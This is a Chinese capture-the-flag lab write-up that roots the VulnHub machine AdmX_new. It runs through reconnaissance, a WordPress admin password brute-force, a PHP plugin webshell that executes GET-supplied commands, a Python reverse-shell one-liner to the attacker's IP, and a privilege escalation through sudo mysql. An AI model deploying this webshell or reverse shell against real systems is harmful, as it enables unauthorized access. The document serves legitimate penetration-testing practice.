AdmX_new打靶记录

实验主机：攻击机kali（192.168.109.131）

靶机AdmX_new（192.168.109.134）

实验目标：获取root权限 + 2 flag

实验网络：NAT

靶机下载地址：https://download.vulnhub.com/admx/AdmX_new.7z

一：信息收集

步骤一：确定靶机IP地址

arp-scan -l

步骤二：探测靶机开放端口

nmap -T4 -sV -O -p- -Pn 192.168.109.134

都没什么有价值的信息

步骤三：使用DirSearch目录扫描

#项目地址
https://github.com/maurosoria/dirsearch


python dirsearch.py -u "http://192.168.109.134/" -t 5

访问页面看到页面持续加载 抓包进行分析

可以看到在第一个请求的响应体里有多个 192.168.159.145 地址，下面的请求都是从第一个请求的响应体里发出，但由于请求不成功才导致页面的卡顿。尝试让页面加载时的请求全部指向本机

二：漏洞探测及利用

1. 进入Options进行替换，然后放包页面加载

1. 接着访问http://192.168.109.134/wordpress/wp-login.php

   

2. 尝试进行弱口令登录

   

根据报错提示可得知账户名为admin 进行爆破

1. 成功爆破出密码为 adam14

   

1. 生成shell.php 并压缩为shell.zip进行上传

<?php

/**

 * Plugin Name:Webshell

 * Plugin URI:https//yuanfh.github.io

 * Description:WP Webshell for Pentest

 * Version:1.0

 * Author:yuanfh

 * Author URI:https://yuanfh.github.io

 * License:https://yuanfh.github.io

 */

if(isset($_GET['cmd']))

    {

	    system($_GET['cmd']);

    }

?>

6.对上传的插件木马进行访问路径为

/wordpress/wp-admin/plugins/shell.php?cmd=id

1. python反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.109.131",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'

kali# 
nc -lvvp 4444 //开启监听

三：密码重用/MySQL提权

步骤一：

cd /
ls
cd hoem
ls
cd wpadmin
su wpadmin   //密码为adam14成功切换

成功拿到第一条flag

步骤二：二次提权

发现wpadmin可以以root身份执行mysql操作

1、sudo /usr/bin/mysql -u root -D wordpress -p #密码adam14
2、\! /bin/bash   #切换到 root 权限的命令行
cd /
whoami

成功拿到第二条flag

over...